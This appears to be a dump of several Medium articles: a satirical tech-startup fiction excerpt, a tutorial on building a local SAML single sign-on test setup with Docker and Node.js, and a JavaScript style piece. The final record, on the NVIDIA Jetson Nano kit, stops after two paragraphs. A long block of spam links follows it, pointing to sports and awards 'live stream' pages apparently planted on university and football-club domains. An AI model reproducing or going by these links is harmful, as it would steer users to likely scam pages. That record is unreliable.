My friend said #EmersonHigh. She wore band aids instead of clothes!!
Within a few seconds, he had two new people following his account. He stretched his fingers and typed his next set of messages.
#LaLala wears no makeup to remind us that talent is more important than beauty. #LaLala pythons remind us that in every snake is a beating heart. #LaLala spotted at #LAX, straddling a plane. Anyone have pictures?
The popularity of Niels_1973 began to climb. The more inane his posts, the more misspellings and melodrama (driven more by inebriation than calculation), the more followers he gained. Niels felt his blood begin to pump again. He gave one of his help me! posts a go, just to see if someone would respond. But despite having amassed four thousand followers in thirty minutes, all hanging on every word he had to say about La Lala, there didn’t seem to be anyone interested in helping the man behind the fleets.
Niels scratched his head, then returned to his notepad. He drew a SWOT analysis listing the strengths, weaknesses, opportunities, and threats of his pop star. When he hit the “weaknesses” box, he realized his error: La Lala skewed toward a much younger audience. Was it really plausible that a pimply fourteen-year-old fan would come to his rescue?
Niels groaned. His demographic targeting had been all wrong. La Lala fans were too young. He needed serious people. People who had driver’s licenses. People who thought a bit more about the consequences of social media. People like…thirty-year-olds.
Niels flipped back to the Flitter homepage to study the most popular age-appropriate topics. What were people fleeting about on a random Monday morning? Scrolling through the list, Niels saw that most of the topics were things he knew nothing about. In addition to the perennial pop music favorites, the list included things like #bitchslap, #whatimknitting, and #blessedmoments. Niels kept scanning, moving farther and farther down the list. And then he saw it: #Poodlekek.
“Yes!”
Niels knew all about Poodlekek. It was his friend’s heavy metal band in college. He was surprised they were still together after two decades, let alone had become so popular. He remembered going to their shows at the campus coffee house, cigarette lighter waving in the air as he and his then-girlfriend sang to guitar-heavy ballads about twisted love, rocky family relationships, and starving children in Ethiopia. Their fans would likely be Niels’ age, the kind of people who would take seriously his cries for help. And Niels had plenty of interesting things he could fleet about them to get people’s attention — like the lead singer’s bad case of the Herp. Women would totally refleet that.
But first things first. He needed to build a new fan base. Niels kicked off his first Poodlekek fleet with a bit of nostalgia.
Raise your lighters for #Poodlekek
Arsyen rose from his bed, ready to conquer an American woman.
It would not be his first attempt. He had made several passes at courtship since arriving in the United States, but most women were too intimidated by his overwhelming virility.
But Jennie, the Anahata receptionist, struck Arsyen as the confident type. She shook his hand without averting her gaze and even scolded him during their campus tour when he complimented Galt. He liked a sassy lady with good teeth.
He had the day all planned out. After lunchtime, he’d surprise Jennie in the reception area and give her his Aimo Air Freshener. Then, after a bit of chitchat, he’d suggest they head to his apartment for some video games and sex. It would be the perfect first date.
The only potential hiccup was keeping his words straight. He wondered whether Sven would practice his English with him that morning.
But Arsyen had no such chance. Sven greeted him as he entered their cubicle, waving a hand bloodied by jelly doughnut. Jennie — his Jennie — was standing next to Sven.
She spotted him and smiled. “Oh, hi! How are you liking Anahata?”
Arsyen shook his head vigorously. He did not have an answer prepared for this.
But Jennie seemed to have no difficulty continuing the conversation by herself, telling Arsyen something about her feminist book club. Little of what she said registered with him. He was watching her lips move, fascinated by the way they came together and then parted as she spoke just to him. They were so different from Natia’s lips, which moved together in fits and jerks, all depending on the bandwidth of her internet connection.
Sven cleared his throat.
“Jane here was just about to tell us what she’s doing here.”
“It’s Jennie,” she said, turning to Sven. “And I’m here because I’m the new nontechnical technical lead.”
“Huh?”
“I’m your new manager,” Jennie said.
It was as if Vesuvius had exploded across the well-manicured lawns of Palo Alto. Sven’s nose twisted until the rest of his face followed in a spiral of despair. Jonas’ mouth froze in a perfect, horrified O.
Arsyen understood their reaction immediately: They were as upset as he was about having a female boss.
“This sounds like the kind of subterfuge the sales team would instigate, sending a nonengineer in here to sabotage our project,” Jonas said.
Sven jotted some lines on a piece of paper and threw it in front of Jennie. “What do you see here?”
Jennie took the paper in her hands, and Arsyen noticed that her wrists bore the remnants of a henna tattoo. She took a few seconds to study the crude drawing, which showed a graph with a diagonal line descending from the top left-hand side to the bottom right.
“Um, a descending line?” she said.
“And what’s the first thing you think of, in the context of Anahata?” Sven asked.
“I don’t know…falling profits?”
“I knew it — imposter!” he yelled, leaping to his feet.
“But I’m not from the sales team. And that was just a line — ”
“You could’ve said it was a Pareto curve, or a drop in latency, or a decrease in the number of users,” Sven said. “There were endless acceptable possibilities.”
“The possibilities were indeed infinite, in a figurative if not exact sense,” Jonas nodded.
“You had so many options, and yet what’s the first thing that comes to mind? Money. You are from sales. Out with you!” Sven’s finger pointed toward the hall, its edict winding across the floor and out the exit door, sending Jennie back to the reception area from whence she came.
Jennie glanced at Arsyen. Help! her eyes seemed to plead. It was clear she didn’t belong there — maybe she had also been trying for a janitorial position, like Arsyen, and had been mistakenly rerouted to Social Car.
“Did you come to clean?” whispered Arsyen, stepping closer. He reached into his pocket to grab the air freshener.
Jennie shot him a dirty look. “You think because I’m a woman I’m supposed to clean your cubicle?”
Jennie opened her leather fringe vest and shoved her chest at Arsyen. Feminism Happens Here, the T-shirt read.
Arsyen froze. He was not used to such forwardness in American women.
Jennie turned back to Sven and Jonas.
“Gregor Guntlag himself asked me to do this. He said I didn’t need to know how to code — just to lead. I’m a tour guide. I know how to lead people.”
Sven | https://medium.com/s/the-big-disruption/the-big-disruption-36fbed0268cf | ['Jessica Powell'] | 2019-06-19 14:03:52.831000+00:00 | ['Technology', 'Marketing', 'Fiction', 'Feminism', 'Equality'] |
193 | Setup a Single Sign On SAML Test Environment with Docker and NodeJS | I’m Jeffry Houser, a developer from the Polaris team in the content engineering group at Disney Streaming Services. Polaris was named after Magneto’s daughter from the X-men, and we builds internal tools that allow editors to create magic for our customers in the video services we power.
When working on one of our tools, we needed to Integrate with a single sign on system that uses SAML for authentication. Setting up a local environment for testing SAML was not a trivial task. A lot of articles we found recommended using Feide OpenIdP as a test provider, however that shut down years ago. Additionally, many of the code samples used outdated libraries, leaving some gaps in our knowledge. It took some trial and error to piece together a working solution and I’m going to teach you how we did it.
Defining Terms
The first time I was exposed to it; SAML was difficult for me to get my head around. As such, I’m going to start out with some definitions that will help you understand the pieces of a SAML application.
Single Sign On (SSO) : Any system that allows authentication code and login data to be shared across multiple applications.
: Any system that allows authentication code and login data to be shared across multiple applications. Security Assertion Markup Language (SAML) : A framework, and XML schema, for implementing Single Sign On.
: A framework, and XML schema, for implementing Single Sign On. Principal : The user who is attempting to gain access to our application.
: The user who is attempting to gain access to our application. Assertions : Data about the principal which are included as part of the SAML response. Samples of this might be the user’s name, or other permission data.
: Data about the principal which are included as part of the SAML response. Samples of this might be the user’s name, or other permission data. Service Provider (SP) : This is the application, or system, that the user is attempting to access. We will build a simple SP as part of this article.
: This is the application, or system, that the user is attempting to access. We will build a simple SP as part of this article. Identity Provider (IdP) : This is a remote application, or system, that authenticates the user and returns data back to the service provider. We’re not going to build an IdP from scratch, but I’ll show you how to set up and use a pre-built one.
: This is a remote application, or system, that authenticates the user and returns data back to the service provider. We’re not going to build an IdP from scratch, but I’ll show you how to set up and use a pre-built one. Globally Unique Identifier: A value that the IdP will use to identify an SP.
Knowing the definitions is a great start but knowing how these pieces work together is even more important and I’ll go over that next.
Review the Application Flow
This is a common flow for a SAML application:
Let’s follow the flow:
The Principal — AKA User — tries to access your Service Provider — AKA your application. The Service Provider checks to see if it knows the Principal. In a browser-based app, this session information would probably be stored as a cookie, but a desktop or application server may store that information in memory. If the user is known, we can load the app normally, so move onto step 8. If the user is not known, jump to step three to start the authentication process. If no user is known, the SP creates a SAML Request and sends that request to the IdP. This request will contain the Globally Unique Identifier so that the IdP knows which application the principal requested access to. Now the IdP handles the request. It will authenticate the user. It may do this based on an existing session from a previous sign in, or it may have the user login anew. Did the IdP successfully collect user details on the Principal? If so, go to step 7, the success set. Otherwise go to step 6 the failure step. If the Principal was not able to login, the IdP will handle authentication errors and the SP will know nothing about the failure. If the IdP successfully logged the user in, it will create a SAML response packet, including assertions about the user, and send the info back to the SP’s callback URL. The SP will use that data to create a user session. If the Principal authenticated properly, then load up the app and let them in.
The rest of this article will focus on steps 3 through 7.
Install Prerequisites
You’ll want to install a prerequisites before we start jumping into the code:
Docker: Docker is a container platform that lets us easily create virtual machines with predefined code. We’re going to use it to easily create our own Identity Provider.
NodeJS: We are going to write our Service Provider from scratch using a NodeJS and some common plugins.
OpenSSL: OpenSSL can be used to create public and private key certificates for. Certs like these are often used for SSL on web sites, but we’re going to use them to encrypt and decrypt the packets we’re sharing between our SP and IdP.
The install instructions at the respective sites will give better setup instructions than anything I could provide here.
Setup our Identity Provider
Creating an identity provider is hard and complicated, so we’re going to use an application that is easily configurable and will run it in a docker container. We’re going to use the SimpleSamPHP IdP application and run it in an existing docker container.
The container is already loaded into the Docker hub, so we can download that without needing to build it from the source. Run this docker command at your command line:
docker pull kristophjunge/test-saml-idp
You’ll see something like this:
Now you should be able to run the docker image:
docker run — name=testsamlidp -p 8080:8080 -p 8443:8443
-e SIMPLESAMLPHP_SP_ENTITY_ID= saml-poc
-e SIMPLESAMLPHP_SP_ASSERTION_CONSUMER_SERVICE=http://localhost:4300/login/callback
-d kristophjunge/test-saml-idp
There is a lot going on in this command, and it can be confusing if you are not familiar with Docker. Let’s look at each part of the command:
docker run : This tells docker to run a new container
: This tells docker to run a new container — name=testsamlidp : This tells Docker that the name of our local container will be testsamlidp.
: This tells Docker that the name of our local container will be testsamlidp. -p 8080:8080 -p 8443:8443 : This is a port mapping. Docker listens to the external port 8080 and maps it to the internal port 8080. Additionally, it listens to port 8443 will map to port 8443 in the docker container. The two ports are for http and https traffic into our IdP.
: This is a port mapping. Docker listens to the external port 8080 and maps it to the internal port 8080. Additionally, it listens to port 8443 will map to port 8443 in the docker container. The two ports are for http and https traffic into our IdP. -e SIMPLESAMLPHP_SP_ENTITY_ID=saml-poc : This passes in an argument to our docker container. This defines the Globally Unique Identifier for the service provider. We’ll use this value in our SP code later
: This passes in an argument to our docker container. This defines the Globally Unique Identifier for the service provider. We’ll use this value in our SP code later -e SIMPLESAMLPHP_SP_ASSERTION_CONSUMER_SERVICE=http://localhost:4300/login/callback : This is another argument we’re passing into the docker container. We’re telling it where to redirect to after a successful login. When we build out the Service Provider, it will be on port 4300 at our localhost.
: This is another argument we’re passing into the docker container. We’re telling it where to redirect to after a successful login. When we build out the Service Provider, it will be on port 4300 at our localhost. -d: The d argument tells us to run the container in the background, and print out the ID.
The d argument tells us to run the container in the background, and print out the ID. kristophjunge/test-saml-idp: This tells docker which image to use for our container.
Run the command and you’ll see something like this:
You can run this command
docker ps
to make sure that the docker image is running:
Try to load the SAML IdP provider in your browser by going to this URL:
http://localhost:8080/simplesaml
You should see something like this:
Click the Authenticated Tab:
Then click on Test configured authentication sources which will bring you to
Then click `example-userpass` link. Opening this URL to your localhost should bring you directly there:
There are two default users created in this app by default:
==================================================================
1 | user1 | user1pass | group1 |
2 | user2 | user2pass | group2 | UID | Username | Password | Group | Email==================================================================1 | user1 | user1pass | group1 | [email protected] 2 | user2 | user2pass | group2 | [email protected]
Enter one of these users and click the login button, you should see the user information output to the screen:
Click around and go back to the login screen. You will not be presented with another login screen until you log out — or until your cookie expires. The IdP is keeping track of your session login and this is independent of the SPs session tracking.
If you think about your day and something that uses single sign on, you’ll realize that you don’t sign on all that much. Google is a great example. I probably access a dozen or so apps that integrate with a single sign on provider — Google Calendar, Gmail, and YouTube are some examples, but will often go for days without signing back in. This caching mechanism on the IdP side allows me to log in once a day, while still have access to all other services.
Create a Service Provider
With the IdP all ready to go, it is time to create the service provider to integrate with it.
Setup The Node Libraries
You should already have NodeJS installed if you followed the perquisite sets earlier in the article. Run:
npm init
In a blank directory to create the project. Enter these values:
Package Name: aop-sp
Version: 1.0.0
Description: Art of Possible Service Provider
Entry Point: index.js
Test command: [leave blank]
Git repository: [leave blank]
Keywords: leave blank
Author: Your Name
License: (ISC)
Is this Okay? Yes
You should see something like this:
Now let’s start installing some Node packages. First, install Express:
npm install express
You should see something like this:
Express is a web server for NodeJS, and we’ll use that as part of our system.
Now install express-session, which allows us to create a server side session associated with a cookie:
npm install express-session
You should see something like this:
Next we want to install an express body parser
npm install body-parser
You’ll see this:
The body parser will parse the responses from incoming requests and let our code access an object instead of trying to deal with raw data as part of the request.
Next, load up the cookie-parser, which copies the cookie header of incoming requests to an object of cookie names:
npm install cookie-parser
You’ll see this:
Next install the Passport Library:
npm install passport
Passport is a very popular authentication framework used on top of Node. You should see this:
Finally, install passport-saml. This is a SAML plugin to the Passport library.
While the Passport library provides a framework for handling authentication, it is extensible to allow for different approaches to be plugged into it. These approaches are called strategies, and the passport-saml library is a SAML strategy for Passport. We use it so that we do not have to manually create packets when requesting a login from the authentication library or process the packets that get returned. This library makes our lives easier by doing that for us.
If you’ve been following along, you should have a package.json that looks something like this:
{
"name": "aop-sp",
"version": "1.0.0",
"description": "Art of Possible Service Provider",
"main": "index.js",
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1"
},
"author": "Jeffry Houser",
"license": "ISC",
"dependencies": {
"body-parser": "^1.19.0",
"cookie-parser": "^1.4.4",
"express": "^4.16.4",
"express-session": "^1.16.1",
"passport": "^0.4.0",
"passport-saml": "^1.0.0"
}
}
Create an empty index.js file in the same directory as the package.json, we’ll get to populating that shortly.
Create Certs
We are going to need three certificate files for our application. First, we’ll use openSSL to create a public and private cert for our application. We’ll encrypt our SAML requests with our private key, and the IdP will use the public key to decrypt them. The IdP will encrypt the responses with its private key, and we’ll use its public key to decrypt the responses.
First, let’s use OpenSSL to create our own keys. Run this at your console:
openssl req -x509 -newkey rsa:4096 -keyout certs\key.pem
-out certs\cert.pem -nodes -days 900
You’ll need to create your certs directory before running that command. This command will step you through a wizard asking you for pertinent information to the key generation. Here are the values I entered:
Country Name : US
: US State or Province : Connecticut
: Connecticut Locality : Central
: Central Organization Name : ArtOfPossible
: ArtOfPossible Organizational Unit : BlogWriter
: BlogWriter Common Name : JeffryHouser
: JeffryHouser EmailAddress: [This space intentionally Left Blank]
You should see something like this with the final results:
You’ll have two files generated from this:
cert.pem : Your Public cert
: Your Public cert key.pem: Your Private cert.
We’ll reference these from our code when creating our service provider. We need one more cert, the IdP’s public cert. To get that, open up the IdP’s metadata page:
http://localhost:8080/simplesaml/saml2/idp/metadata.php
You should see:
Look for the X509Certificate tag in the XML and copy it to a file named idp_key.pem in your certs directory.
Setup Express Web Sever
Let’s set up Express. Open up the empty index.js. Start with some imports:
var express = require("express");
var session = require('express-session');
var bodyParser = require('body-parser');
var cookieParser = require('cookie-parser');
This imports the express web server and three plugins — express-session, body-parser, and cookie-parser.
Now create an instance of Express, and save to the app variable:
var app = express();
Now, we tell the Express instance to use the other plugs. First, the cookieParser:
app.use(cookieParser());
Cookies will be required to tell whether the user is authenticated or not. This will be done behind the scenes by the passport library.
Now set up the bodyParser:
app.use(bodyParser.urlencoded({ extended: false }))
app.use(bodyParser.json())
The body parser can turn the body text of a URL request into a simple object for us to access. The urlencoded() command will handle `application/x-www/form-urlencoded` values. The json() command will take care of any JSON values.
Finally, set up the session:
app.use(session({secret: 'secret',
resave: false,
saveUninitialized: true,}));
The secret value is used to sign a sessionID cookie. The sessionID will reference the server-side session. We can use any value we want for the secret key, but for the purposes of this sample I made it simple. The resave value determines whether to save the session value back into the session store after every request, even if it was not changed. Typically there is no need to do this. The saveUninitailized value is set to true. This means that a session is always saved after it was created even if it did not change.
Now let’s create a handler for the root of our application:
app.get('/',
function(req, res) {
res.send('Test Home Page');
}
);
This is a get() request on the express app variable. It looks for the root directory, ‘/’. The way that express works is that each request is a collection of functions. The function accepts the request and response arguments, abbreviated to req and res respectively. In this case, we only run a single function which returns the text ‘Test Home Page’. Later we’ll run functions to validate users.
Finally, add some code to start the server:
var server = app.listen(4300, function () {
console.log('Listening on port %d', server.address().port)
});
This will listen to port 4300, and show something on the console to prove that is listening.
Run the server:
node index
You should see:
Load the root in your browser at http://localhost:4300 :
Pop open the web developer tools to look at your cookies. Go to the Application tab and expand cookies under storage:
You should see the connect.sid cookie which was created by the express server. This is the session identifier that the server uses to track you between browser requests. Your browser is successfully hooked up to a server session, even though no data is stored in it yet.
Configure Simple-SAML
Now we’re ready to setup the Passport and SAML libraries. First load the libraries:
var passport = require('passport');
var saml = require('passport-saml');
var fs = require('fs');
I’ve already mentioned passport and passport-saml, but I also add the fs library, which will let us access the file system. We’ll use that to load our certs from disk into the SAML configuration.
Passport requires that we add functions to serialize and deserialize the user, so that is the first thing we’ll do:
passport.serializeUser(function(user, done) {
console.log('-----------------------------');
console.log('serialize user');
console.log(user);
console.log('-----------------------------');
done(null, user);
}); passport.deserializeUser(function(user, done) {
console.log('-----------------------------');
console.log('deserialize user');
console.log(user);
console.log('-----------------------------');
done(null, user);
});
These functions are default functions that just output the user to the console, which is a great debugging tool.
We need to set up a samlStrategy, so that Passport knows how to create requests and process the login. Start with this:
var samlStrategy = new saml.Strategy({
// config options here
}, function(profile, done) {
return done(null, profile);
});
The saml.Strategy() accepts two arguments. The first is a configuration object, which I left blank for the moment, and the second is a function which processes the user. The first argument into the function is a profile object, and the second is done, a callback. For our purposes, we are just loading executing the callback and sending it the profile object unchanged. If we needed to do more functionality, such as load application specific permissions from a database, this could be done here.
Now, let’s populate the configuration object with values. I decided to drop these in one by one so I could explain each one:
callbackUrl: 'http://localhost/login/callback',
The callbackUrl is a URL in our application — the service provider — where the IdP will post back to after a successful user authentication. We haven’t created this URL yet, but we will.
entryPoint: 'http://localhost:8080/simplesaml/saml2/idp/SSOService.php',
The entryPoint is the URL in the IdP that we will send our request to in order to let the user authenticate. When we ran the docker image to create our local IdP, we passed this value into it as a configuration option named SIMPLESAMLPHP_SP_ASSERTION_CONSUMER_SERVICE.
Now the issuer:
issuer: 'saml-poc',
The issuer is a globally unique identifier for our application. When we ran the docker image, we passed this value into it as a configuration option named SIMPLESAMLPHP_SP_ENTITY_ID.
identifierFormat: null,
The identifierFormat is a specific format you can request from the IdP. We’re leaving it null here, but most likely your IdP administrators will provide a value that you must enter.
Now set up the keys:
decryptionPvk: fs.readFileSync(__dirname + '/certs/key.pem', 'utf8'),
privateCert: fs.readFileSync(__dirname + '/certs/key.pem', 'utf8'),
The decryptionPvK and privateCert both refer to the local private key we generated. They are used to encrypt the authentication request before we send it to the IdP. This is where I’m using the fs library to load the cert from disc.
validateInResponseTo: false,
The validateInResponseTo value will determine if the incoming SAML responses need to be validated or not. I set it to false for simplicity in our sample.
disableRequestedAuthnContext: true
The disableRequestdAuthnContext is another Boolean value. This can be helpful when authenticating against an Active Directory Server.
That completes our samlStrategy configuration object.
After the strategy creation, tell passport to use the samlStrategy:
passport.use('samlStrategy', samlStrategy);
Simple enough, now initialize passport:
app.use(passport.initialize({}));
app.use(passport.session({}));
The session() is middleware that allows for persistent login — AKA keeping track of users.
Create Login Routes
Let’s create the login handler. It is pretty simple:
app.get('/login',
function (req, res, next) {
console.log('-----------------------------');
console.log('/Start login handler');
next();
},
passport.authenticate('samlStrategy'),
);
I’m using a get() handler on the app variable, and the value is ‘/login’. That means when I load `http://localhost:4300/login` it will run the functions, one after each other. The first function just outputs to the console that the log is executed, and then calls next(). The next() function is a reference to the next handler function. For the next handler function, we are just telling the passport library to authenticate using the ‘samlStrategy’. This will redirect to the IdP which will handle login, and post results back to a `login/callback` handler.
Here is the callback handler:
app.post('/login/callback',
function (req, res, next) {
console.log('-----------------------------');
console.log('/Start login callback ');
next();
},
passport.authenticate('samlStrategy'),
function (req, res) {
console.log('-----------------------------');
console.log('login call back dumps');
console.log(req.user);
console.log('-----------------------------');
res.send('Log in Callback Success');
}
);
This calls the post() method on the express instance, app. The URL is the first argument of the method, ‘/login/callback/’. First there is a function, which just logs the currently running request; and calls next() so that the next function can run. The next function is the passport.authentication() call. This is the same code that we had in login, but here in the callback it sees that we have a return value from the IdP and processes it by calling the serializeUser() function we set up earlier. Then it calls the next function, which outputs the user returned from the service.
Try this. First load up:
http://localhost:4300/login
You won’t see anything, but you’ll automatically be redirected to the IdP login screen:
Look at your web server console:
You’ll see that the login handler was properly hit before the redirect.
Now Enter user1 and user1pass and click Login:
You can see that the “Login in CallBack Success” is loaded in the page’s body. Checking the cookies in the web developer tools you see three:
PHPSESSIDIDP : This is a session identifier set by the IdP.
: This is a session identifier set by the IdP. SimpleSAMLAuthTokenIdp : This is a User identifier set by the IdP.
: This is a User identifier set by the IdP. connect.sid: This is the session identification token set by our express-session plugin.
Check out the console:
You see after the initial login handler was run; the login callback was run. The serializeUser() dumped the user information out to the console; and then again the callback URL dumped out the same user info. This app demonstrates that the login succeeds even if we aren’t doing anything with it yet. The information you get back in the user object depends primarily on what the IdP is programmed to send you.
Create our own metadata link
You may remember that the IdP had a metadata link. We used that to get the public key we passed into the cert option of our samlStrategy variable. We can create our own metadata route to provide that information to the IdP we are integrating with:
app.get('/metadata',
function(req, res) {
res.type('application/xml');
res.status(200).send(
samlStrategy.generateServiceProviderMetadata(
fs.readFileSync(__dirname + '/certs/cert.pem', 'utf8'),
fs.readFileSync(__dirname + '/certs/cert.pem', 'utf8')
)
);
}
);
This creates a get request for metadata, and we use the generateServiceProviderMetadata() to generate this pages XML. It outputs the public cert in utf8 format. Reload the app with the metadata in here:
The great thing about this metadata page is that we can use it to share our internal details with the IdP and the IdP can use it to share its internal details with us. Hopefully we can use it to automate part of our systems so when data changes on one side, the other doesn’t have to manually make changes.
Final Thoughts
I know this article makes it sound super easy to set this up, but our team stumbled a bit doing it. My success is because I was able to stand on their shoulders, and I’m happy to share this with you.
For our apps, it is important to secure things up and down the stack and integrating this SSO approach was a big step forward and making that happen. | https://medium.com/disney-streaming/setup-a-single-sign-on-saml-test-environment-with-docker-and-nodejs-c53fc1a984c9 | ['Jeffry Houser'] | 2019-07-11 14:35:28.685000+00:00 | ['Technology', 'Passportjs', 'Nodejs', 'Docker', 'Saml'] |
194 | JavaScript Best Practices — Renaming Imports and Proper Variable Declaration | JavaScript is a very forgiving language. It’s easy to write code that runs but has mistakes in it.
In this article, we’ll look at the proper way to rename imports and how to declare JavaScript variables properly.
No Renaming Import, Export, and Destructured Assignments to the Same Name
In JavaScript, we can rename our imported members and members that are exported with the as keyword.
Likewise, we can rename destructured assignments variable to the name that we want with the colon and the name we want after it.
For instance, we can rename an imported member as follows:
import { foo as bar } from "./module";
In the code above, we imported the foo member from module.js and then renamed it to bar in the current module by using the as keyword as we did above.
Then we can reference bar instead of foo in the current module.
We can also do the same thing for exports. For instance, we can write the following to export a member with a different name than it’s defined as.
To do that, we can write the following:
module.js
const foo = 1;
export { foo as bar };
index.js
import { bar } from "./module";
In the code above, we defined the constant foo in module.js and exported it as bar by using the as keyword in our export statement.
This lets us rename our exports before it’s exported.
We can also rename destructured assignments as by writing the following code:
const {
foo: bar
} = {
foo: 1
};
In the code above, we renamed our destructured foo property to bar by writing:
{
foo: bar
}
Then the JavaScript will pick up the foo property from the right side and then set its value as the value of bar so that we reference it with bar instead of foo .
This is a convenient way to destructure object properties to variables and also rename them with the variable name that we want.
However, with these syntactic sugars, we can use them in useless ways by renaming them to the same name as they’re originally defined.
For instance, with imports, we can write the following code:
import { foo as foo } from "./module";
With exports, we can write something like:
const foo = 1;
export { foo as foo };
And with destructuring syntax, we can write:
const {
foo: foo
} = {
foo: 1
};
Since we renamed the variable to the same name as before, the renaming code is useless.
Therefore, we should remove them.
For imports, we just write:
import { foo } from "./module";
We can rewrite our export code as follows:
export const foo = 1;
And with destructuring, we can write:
const {
foo
} = {
foo: 1
};
Photo by Kyaw Tun on Unsplash
Use let or const Instead of var to Declare Variables and Constants
In modern versions of JavaScript, there’s a right way to declare variables and constants.
We should eliminate anything that’s declared with var and use let or const instead.
With var the variables declared with it are function scoped and are hoisted, leading to lots of confusion among developers.
We don’t want lots of confusing in are code that is caused by that.
For instance, with var , our code can be accessed outside blocks. For instance, we can define and access a variable as follows:
const foo = () => {
if (true) {
var x = 1;
}
console.log(x);
} foo();
In the code above, we’ll see that the console log outputs 1 because x is available outside the block since it’s declared with var .
Also, we can reference x before it’s defined because of hoisting, so if we have:
const foo = () => {
console.log(x);
if (true) {
var x = 1;
}
}
Then logging x will log undefined since we logged x ‘s value before it’s defined.
This is confusing to lots of people, and so since ES6, we have the let and const keywords to declare variables and constants respectively.
let and const are block-scoped so that variables and constants declared with them can’t be accessed outside blocks.
For instance, the following will give us an error because we tried to access the variable outside the block:
const foo = () => {
console.log(x);
if (true) {
let x = 1;
}
}
The following will also give us an error:
const foo = () => {
if (true) {
let x = 1;
}
console.log(x);
}
We can only access x inside the if block as follows:
const foo = () => {
if (true) {
let x = 1;
console.log(x);
}
}
With const , we can declare constants, which means that they can’t be reassigned to a new value. It’s also block-scoped like let .
When we declare variables with let and const , there’s no confusion.
Conclusion
We shouldn’t rename imports, exports, and destructured assignments to the same as it was before since it’s useless. | https://medium.com/swlh/javascript-best-practices-renaming-imports-and-proper-variable-declaration-aa405c191bee | ['John Au-Yeung'] | 2020-05-27 16:49:59.615000+00:00 | ['JavaScript', 'Software Development', 'Programming', 'Technology', 'Web Development'] |
195 | This $59 A.I. Kit Could Change How You Think About Smart Devices Forever | Photo: NVIDIA Jetson Nano 2GB Developer Kit/NVIDIA
Artificial intelligence has been heralded as the next wave of computing for years, but learning or even tinkering with it has required access to expensive hardware with powerful GPUs capable of crunching massive data sets.
That’s starting to change with the debut of cheap all-in-one A.I. computers from companies like Nvidia, which introduced its latest Jetson Nano A.I. developer kit this week — for just $59. The Jetson is a full computer in a tiny package, similar to a Raspberry Pi, that allows hacking on projects or learning from home, while making A.I. accessible to a much broader audience.
https://ims.utoronto.ca/bagan/tak/Chargers-v-Jets-liv-stream.html
https://ims.utoronto.ca/bagan/tak/Chargers-v-Jets-liv-stream1.html
https://ims.utoronto.ca/bagan/tak/Chargers-v-Jets-liv-stream2.html
https://ims.utoronto.ca/bagan/tak/Chargers-v-Jets-liv-stream3.html
https://ims.utoronto.ca/bagan/tak/Colts-v-Packers-liv-stream.html
https://ims.utoronto.ca/bagan/tak/Colts-v-Packers-liv-stream1.html
https://ims.utoronto.ca/bagan/tak/Colts-v-Packers-liv-stream2.html
https://ims.utoronto.ca/bagan/tak/Colts-v-Packers-liv-stream3.html
https://ims.utoronto.ca/bagan/tak/Dolphins-v-Broncos-stream-liv.html
https://ims.utoronto.ca/bagan/tak/Dolphins-v-Broncos-stream-liv1.html
https://ims.utoronto.ca/bagan/tak/Dolphins-v-Broncos-stream-liv2.html
https://ims.utoronto.ca/bagan/tak/Dolphins-v-Broncos-stream-liv3.html
https://ims.utoronto.ca/bagan/tak/Vikings-v-Cowboys-liv-streaming.html
https://ims.utoronto.ca/bagan/tak/Vikings-v-Cowboys-liv-streaming1.html
https://ims.utoronto.ca/bagan/tak/Vikings-v-Cowboys-liv-streaming2.html
https://ims.utoronto.ca/bagan/tak/Vikings-v-Cowboys-liv-streaming3.html
https://parisfc.fr/bagan/tak/Chargers-v-Jets-liv-stream.html
https://parisfc.fr/bagan/tak/Chargers-v-Jets-liv-stream1.html
https://parisfc.fr/bagan/tak/Chargers-v-Jets-liv-stream2.html
https://parisfc.fr/bagan/tak/Chargers-v-Jets-liv-stream3.html
https://parisfc.fr/bagan/tak/Colts-v-Packers-liv-stream.html
https://parisfc.fr/bagan/tak/Colts-v-Packers-liv-stream1.html
https://parisfc.fr/bagan/tak/Colts-v-Packers-liv-stream2.html
https://parisfc.fr/bagan/tak/Colts-v-Packers-liv-stream3.html
https://parisfc.fr/bagan/tak/Dolphins-v-Broncos-stream-liv.html
https://parisfc.fr/bagan/tak/Dolphins-v-Broncos-stream-liv1.html
https://parisfc.fr/bagan/tak/Dolphins-v-Broncos-stream-liv2.html
https://parisfc.fr/bagan/tak/Dolphins-v-Broncos-stream-liv3.html
https://parisfc.fr/bagan/tak/Vikings-v-Cowboys-liv-streaming.html
https://parisfc.fr/bagan/tak/Vikings-v-Cowboys-liv-streaming1.html
https://parisfc.fr/bagan/tak/Vikings-v-Cowboys-liv-streaming2.html
https://parisfc.fr/bagan/tak/Vikings-v-Cowboys-liv-streaming3.html
https://h2i.utoronto.ca/glu/tak/Dolphins-v-Broncos-stream-liv.html
https://h2i.utoronto.ca/glu/tak/Dolphins-v-Broncos-stream-liv1.html
https://h2i.utoronto.ca/glu/tak/Dolphins-v-Broncos-stream-liv2.html
https://h2i.utoronto.ca/glu/tak/Dolphins-v-Broncos-stream-liv3.html
https://h2i.utoronto.ca/glu/tak/Vikings-v-Cowboys-liv-streaming.html
https://h2i.utoronto.ca/glu/tak/Vikings-v-Cowboys-liv-streaming1.html
https://h2i.utoronto.ca/glu/tak/Vikings-v-Cowboys-liv-streaming2.html
https://h2i.utoronto.ca/glu/tak/Vikings-v-Cowboys-liv-streaming3.html
https://h2i.utoronto.ca/glu/tak/Chargers-v-Jets-liv-stream.html
https://h2i.utoronto.ca/glu/tak/Chargers-v-Jets-liv-stream1.html
https://h2i.utoronto.ca/glu/tak/Chargers-v-Jets-liv-stream2.html
https://h2i.utoronto.ca/glu/tak/Chargers-v-Jets-liv-stream3.html
https://h2i.utoronto.ca/glu/tak/Colts-v-Packers-liv-stream.html
https://h2i.utoronto.ca/glu/tak/Colts-v-Packers-liv-stream1.html
https://h2i.utoronto.ca/glu/tak/Colts-v-Packers-liv-stream2.html
https://h2i.utoronto.ca/glu/tak/Colts-v-Packers-liv-stream3.html
https://h2i.utoronto.ca/glu/awd/maria-amas-v-awards-red-carpet-hq00.html
https://h2i.utoronto.ca/glu/awd/maria-amas-v-awards-red-carpet-hq01.html
https://h2i.utoronto.ca/glu/awd/maria-amas-v-awards-red-carpet-hq02.html
https://h2i.utoronto.ca/glu/awd/maria-amas-v-awards-red-carpet-hq03.html
https://ims.utoronto.ca/bagan/awd/maria-amas-v-awards-red-carpet-hq00.html
https://ims.utoronto.ca/bagan/awd/maria-amas-v-awards-red-carpet-hq01.html
https://ims.utoronto.ca/bagan/awd/maria-amas-v-awards-red-carpet-hq02.html
https://ims.utoronto.ca/bagan/awd/maria-amas-v-awards-red-carpet-hq03.html
